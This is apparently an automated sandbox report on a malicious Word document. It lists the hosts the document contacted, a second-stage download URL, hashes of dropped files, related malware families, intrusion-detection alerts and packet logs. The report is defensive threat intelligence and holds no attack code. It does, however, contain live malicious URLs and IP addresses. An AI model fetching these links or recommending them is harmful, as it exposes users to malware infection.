Name	IP	Active	Malicious	Antivirus Detection	Reputation
s-0005.dual-s-msedge.net	52.123.128.14	true	false		high
kuhlinks.de	104.21.47.51	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc	false	Avira URL Cloud: safe	unknown
https://kuhlinks.de/3ri5DVX	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.47.51	kuhlinks.de	United States		13335	CLOUDFLARENETUS	true
216.9.224.185	unknown	Reserved		7018	ATT-INTERNET4US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1654507
Start date and time:	2025-04-02 11:54:28 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	IMP 7527518303 2507294.docx.doc
Detection:	MAL
Classification:	mal60.evad.winDOC@2/4@1/2
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, TextInputHost.exe
Excluded IPs from analysis (whitelisted): 52.109.8.89, 52.109.6.63, 20.189.173.27, 23.204.23.20, 52.111.251.19, 52.111.251.16, 52.111.251.18, 52.111.251.17, 23.196.3.185, 23.196.3.178, 52.123.128.14, 20.190.144.138, 172.202.163.200, 20.109.210.53
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, cus-config.officeapps.live.com, eus2-azsc-000.roaming.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, osiprod-eus2-buff-azsc-000.eastus2.cloudapp.azure.com, prod-canc-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, onedscolprdwus21.westus.cloudapp.azure.com, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, c.pki.goog, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod-na.naturallanguageeditorservice.osi.office.net.akadns.net, prod.roaming1.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, us1.roaming1.live.com.akadns.net, prod1.natural
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.47.51	Solicitud de cotizaci#U00f3n.xls	Get hash	malicious	Remcos, DBatLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-0005.dual-s-msedge.net	Newsletter Avril 2025 (206Ko).msg	Get hash	malicious	Unknown	Browse	52.123.128.14
	FW What it takes to build a great search mobile experience.msg	Get hash	malicious	Unknown	Browse	52.123.128.14
	Inquiry-140-120.xla.xlsx	Get hash	malicious	Unknown	Browse	52.123.128.14
	Inquiry-140-120.xla.xlsx	Get hash	malicious	Unknown	Browse	52.123.128.14
	Inquiry-140-120.xla.xlsx	Get hash	malicious	Unknown	Browse	52.123.128.14
	Revised - Buncombe county government 2025 Handbook33469.doc	Get hash	malicious	Unknown	Browse	52.123.129.14
	VUE-KMH-462E Missed Amex Entry-Mar-25 1.xlsm	Get hash	malicious	Unknown	Browse	52.123.128.14
	VUE-KMH-462E Missed Amex Entry-Mar-25 1.xlsm	Get hash	malicious	Unknown	Browse	52.123.129.14
	Inquiry-140-120.xla.xlsx	Get hash	malicious	Unknown	Browse	52.123.129.14
	http://benedictocollege1-my.sharepoint.com/:f:/g/personal/ryacassey_montillano_benedictocollege_edu_ph/EqNqk_rEp1RHm2UFQLxbuYoBbS5GFhosjapIHgSzIrrsZQ?e=4SvNeC	Get hash	malicious	Unknown	Browse	52.123.129.14
kuhlinks.de	Solicitud de cotizaci#U00f3n.xls	Get hash	malicious	Remcos, DBatLoader	Browse	104.21.47.51

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	OPhdi5uSb6.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer	Browse	172.67.168.77
	file.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	172.67.197.67
	file.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	172.67.197.67
	NEW ORDER_PDF.exe	Get hash	malicious	FormBook	Browse	172.67.132.85
	rRoklubber.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	Draft Copy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	invoice.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.131.170
	random.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.197.67
	random.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.1
	random.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
ATT-INTERNET4US	xd.mips.elf	Get hash	malicious	Mirai	Browse	108.76.39.172
	xd.powerpc-440fp.elf	Get hash	malicious	Mirai	Browse	68.90.163.145
	xd.arm.elf	Get hash	malicious	Mirai	Browse	108.219.97.68
	xd.x86.elf	Get hash	malicious	Mirai	Browse	108.253.120.12
	xd.arm7.elf	Get hash	malicious	Mirai	Browse	172.146.100.88
	xd.i686.elf	Get hash	malicious	Mirai	Browse	99.116.15.45
	xd.sh4.elf	Get hash	malicious	Mirai	Browse	63.207.1.40
	xd.spc.elf	Get hash	malicious	Mirai	Browse	70.132.145.224
	xd.mpsl.elf	Get hash	malicious	Mirai	Browse	108.80.129.103
	xd.i486.elf	Get hash	malicious	Mirai	Browse	99.161.33.98

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	OPhdi5uSb6.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer	Browse	104.21.47.51
	file.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	104.21.47.51
	file.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	104.21.47.51
	invoice.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.47.51
	random.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.47.51
	random.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.47.51
	random.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.47.51
	random.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.47.51
	L6qFGFpZpp.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.47.51
	qWR3lUj.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.47.51
37f463bf4616ecd445d4a1937da06e19	rRoklubber.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.47.51
	Sodium Starch Glycolate (Type D)TF45201203 typeD USP41.exe	Get hash	malicious	GuLoader	Browse	104.21.47.51
	Employee Feedback on offset schedule.exe	Get hash	malicious	Remcos, GuLoader	Browse	104.21.47.51
	Performance Report_pdf.exe	Get hash	malicious	GuLoader, Remcos	Browse	104.21.47.51
	e-dekont #U2013 02.04.2025.exe	Get hash	malicious	GuLoader	Browse	104.21.47.51
	rPaymentAdvice.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse	104.21.47.51
	http://cdn.systweak.com/downloads/setups/dpfw/dpfsetup_afterupdate_1004.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	104.21.47.51
	KOKnn.52701.02.exe	Get hash	malicious	Unknown	Browse	104.21.47.51
	KOKnn.52701.02.exe	Get hash	malicious	Unknown	Browse	104.21.47.51

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	212830
Entropy (8bit):	7.948337433898583
Encrypted:	false
SSDEEP:	6144:XoHkODAZzMhFeWcgtl9h7AZIDRNX3WpYT5+vq5E:XoHtIYhcHgtlT7AZgzX3WpYd+C6
MD5:	2F30B95D50E2A512205BED433165D2E9
SHA1:	CC0A94810485E92F1EC322307998506E73684F85
SHA-256:	A5F5CCC77A818789947CD5E2D79B56348AC8234CEBC68641CD451FCE6BFF6CD9
SHA-512:	FC721ECA9688704598EC79FD9CB8C4800F880DF1363259C1A958B0F4456BFEEE4B47A7433ED0340EFAAA185CA6D293BBB55063AAB2DF6305CC76A0EFA8DEF198
Malicious:	true
Reputation:	low
Preview:	PK..........!.Jj.@............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0....."..."..j.......`.Ic.<SH.~'M[!D.r..I.....c;...[g.'Hh./.i1...h....w.;?....Z...+@q9.q2._E...=..!..Rb.SX...#uHN.?....zT......'.S.!.k...Rv....\-..>...q]}.w..fM....T..T.8...~E.o...\.`c"..=....}...M.:TK.%...Jc.@....>+...A..KFCv...Q...sHZ......wj1....H0.........._O..........Q.Dx....Q.....C .h...I.B..#1l......!.~=A/\|..........^.H...?._..o^....^..S... .H.B...._?...2.,9....<x.................Y...A7.h.ox...6

C:\Users\user\Desktop\~$P 7527518303 2507294.docx.doc

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	4.709975681293099
Encrypted:	false
SSDEEP:	3:iXKWJRMlW8Gvgs/TFU98qrj9WizoO2WnaEEPn:i/fMlW8GvgsLzCP7aEEPn
MD5:	69C4E539678444561D2A695BDB0274B0
SHA1:	4A5D17FA2A5F7FC8534F387438D6E5C6E5E3C6DA
SHA-256:	CFBE33D9FEED8D11D4951998C2C001563D50BAE237AE7C8E3DD4BAF7F58C5F54
SHA-512:	4B01E1B922260277B517CA0D1F306666BE68976A76F5DCD00580B8F9E75C2910C4019341473D0EBAD7714298B87815807E054B643F2D637267B43B04277042E7
Malicious:	false
Reputation:	low
Preview:	.user..............................................f.r.o.n.t.d.e.s.k...-F..\.....\|<v,....NveX'..qV.... N.G...a.sa.*V.K.]!.~.............%..}.cj.........=!j

C:\Users\user\Desktop\~WRD0000.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	212830
Entropy (8bit):	7.948337433898583
Encrypted:	false
SSDEEP:	6144:XoHkODAZzMhFeWcgtl9h7AZIDRNX3WpYT5+vq5E:XoHtIYhcHgtlT7AZgzX3WpYd+C6
MD5:	2F30B95D50E2A512205BED433165D2E9
SHA1:	CC0A94810485E92F1EC322307998506E73684F85
SHA-256:	A5F5CCC77A818789947CD5E2D79B56348AC8234CEBC68641CD451FCE6BFF6CD9
SHA-512:	FC721ECA9688704598EC79FD9CB8C4800F880DF1363259C1A958B0F4456BFEEE4B47A7433ED0340EFAAA185CA6D293BBB55063AAB2DF6305CC76A0EFA8DEF198
Malicious:	false
Reputation:	low
Preview:	PK..........!.Jj.@............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0....."..."..j.......`.Ic.<SH.~'M[!D.r..I.....c;...[g.'Hh./.i1...h....w.;?....Z...+@q9.q2._E...=..!..Rb.SX...#uHN.?....zT......'.S.!.k...Rv....\-..>...q]}.w..fM....T..T.8...~E.o...\.`c"..=....}...M.:TK.%...Jc.@....>+...A..KFCv...Q...sHZ......wj1....H0.........._O..........Q.Dx....Q.....C .h...I.B..#1l......!.~=A/\|..........^.H...?._..o^....^..S... .H.B...._?...2.,9....<x.................Y...A7.h.ox...6

C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	Microsoft Word 2007+
Entropy (8bit):	7.99456518308567
TrID:	Word Microsoft Office Open XML Format document (49504/1) 58.23% Word Microsoft Office Open XML Format document (27504/1) 32.35% ZIP compressed archive (8000/1) 9.41%
File name:	IMP 7527518303 2507294.docx.doc
File size:	198'372 bytes
MD5:	c8675988aa2bc47338861b4d62aa517d
SHA1:	67366589c5fbfa1153aa10a3d06b88d12719cdca
SHA256:	315b8754f30097fb04f76e09719a8415c53103a8c8abd6c7e988a918a2791476
SHA512:	9ba648f7362f74b44c0a752af1d8ff96859bf6da820e3e5503a51548e1864b17c3783aec66017ad29d9e632793a6613c386f84b03fc6fa14b00001ca74d775b2
SSDEEP:	3072:s3+eKSeRCX3Wp5STIrGvy3KJorM/+nKiTXcN7H4siQvIOKDS5QZV:s3peoX3WpYTvHqrM/jiTXgxvYeIV
TLSH:	6814227A523161D6CF6A05B11585CFAC5649402E28053AEBEF3067CFCCFBA7D5E79880
File Content Preview:	PK........BX.Z................[Content_Types].xmlUT...Y..gY..gY..g.VKk.@......^..v....9..1.4.....Z./v&...;k9..Tr.._$..{.c.]\..-^ .....j&..M...j.....".$....C-6..jy.i......=..#._........<G...".L+.U..V /f......SI.C,.wl ....Jt.......lC ...b:Q\..,]...5."6._.~'

File Icon


Icon Hash:	35e1cc889a8a8599

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "IMP 7527518303 2507294.docx.doc"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-04-02T11:55:34.333098+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49683	104.21.47.51	443	TCP
2025-04-02T11:55:35.822625+0200	1810005	Joe Security ANOMALY Microsoft Office WebDAV Discovery	1	192.168.2.7	49684	104.21.47.51	443	TCP
2025-04-02T11:55:36.047206+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49685	104.21.47.51	443	TCP

Network Port Distribution

Total Packets: 130
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 2, 2025 11:55:34.049041986 CEST	49683	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:34.049093008 CEST	443	49683	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:34.049216032 CEST	49683	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:34.049855947 CEST	49683	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:34.049882889 CEST	443	49683	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:34.332961082 CEST	443	49683	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:34.333097935 CEST	49683	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:34.334940910 CEST	49683	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:34.334949970 CEST	443	49683	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:34.335242033 CEST	443	49683	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:34.337064981 CEST	49683	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:34.380283117 CEST	443	49683	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:34.979288101 CEST	443	49683	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:34.979407072 CEST	443	49683	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:34.979496956 CEST	49683	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:34.982675076 CEST	49683	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:34.982697010 CEST	443	49683	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:35.006170988 CEST	49684	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:35.006202936 CEST	443	49684	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:35.006443024 CEST	49684	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:35.007169008 CEST	49684	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:35.007181883 CEST	443	49684	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:35.259948969 CEST	443	49684	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:35.260051966 CEST	49684	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:35.287637949 CEST	49684	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:35.287652969 CEST	443	49684	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:35.287923098 CEST	443	49684	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:35.287988901 CEST	49684	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:35.289829016 CEST	49684	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:35.336272955 CEST	443	49684	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:35.822627068 CEST	443	49684	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:35.822685003 CEST	49684	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:35.822705030 CEST	443	49684	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:35.822753906 CEST	443	49684	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:35.822808981 CEST	49684	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:35.822808981 CEST	49684	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:35.825973034 CEST	49684	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:35.825989962 CEST	443	49684	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:35.843261957 CEST	49685	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:35.843302011 CEST	443	49685	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:35.843403101 CEST	49685	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:35.843620062 CEST	49685	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:35.843627930 CEST	443	49685	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:36.046503067 CEST	443	49685	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:36.047205925 CEST	49685	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:36.047219038 CEST	443	49685	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:36.048243046 CEST	49685	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:36.048248053 CEST	443	49685	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:36.595643997 CEST	443	49685	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:36.595716953 CEST	443	49685	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:36.595794916 CEST	49685	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:36.595911026 CEST	49685	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:36.595922947 CEST	443	49685	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:36.601572990 CEST	49687	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:36.823343039 CEST	80	49687	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:36.823487043 CEST	49687	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:36.823698044 CEST	49687	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:37.044899940 CEST	80	49687	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:37.094654083 CEST	49687	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:37.099436045 CEST	49689	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:37.099477053 CEST	443	49689	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:37.099606037 CEST	49689	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:37.099842072 CEST	49689	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:37.099857092 CEST	443	49689	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:37.301743031 CEST	443	49689	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:37.301898956 CEST	49689	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:37.302433968 CEST	49689	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:37.302443027 CEST	443	49689	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:37.302747011 CEST	49689	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:37.302752018 CEST	443	49689	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:37.863627911 CEST	443	49689	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:37.863684893 CEST	49689	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:37.863702059 CEST	443	49689	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:37.863755941 CEST	443	49689	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:37.863768101 CEST	49689	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:37.863843918 CEST	49689	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:37.866683960 CEST	49689	443	192.168.2.7	104.21.47.51
Apr 2, 2025 11:55:37.866697073 CEST	443	49689	104.21.47.51	192.168.2.7
Apr 2, 2025 11:55:37.867948055 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.086285114 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.086381912 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.086529016 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.307533026 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.307549953 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.307605982 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.307816029 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.307827950 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.307868004 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.307878971 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.307894945 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.307903051 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.307929993 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.523999929 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.524025917 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.524056911 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.524074078 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.524090052 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.524111986 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.524157047 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.524171114 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.524223089 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.524238110 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.524250984 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.524291992 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.524321079 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.747323036 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.747349024 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.747360945 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.747416019 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.747452974 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.748049021 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.748063087 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.748074055 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.748085976 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.748112917 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.748126030 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.748138905 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.748161077 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.967845917 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.967987061 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.968756914 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.968802929 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.968827963 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.968843937 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.968857050 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.968867064 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.968884945 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.968909025 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.968918085 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.968931913 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.968944073 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.968954086 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.968965054 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.968980074 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:38.968996048 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:38.969024897 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.186269999 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.186383963 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.186399937 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.186414003 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.186444044 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.186798096 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.186862946 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.187545061 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.187558889 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.187571049 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.187582970 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.187592030 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.187602997 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.187612057 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.187622070 CEST	80	49692	216.9.224.185	192.168.2.7
Apr 2, 2025 11:55:39.187642097 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.187659025 CEST	49692	80	192.168.2.7	216.9.224.185
Apr 2, 2025 11:55:39.402272940 CEST	80	49692	216.9.224.185	192.168.2.7
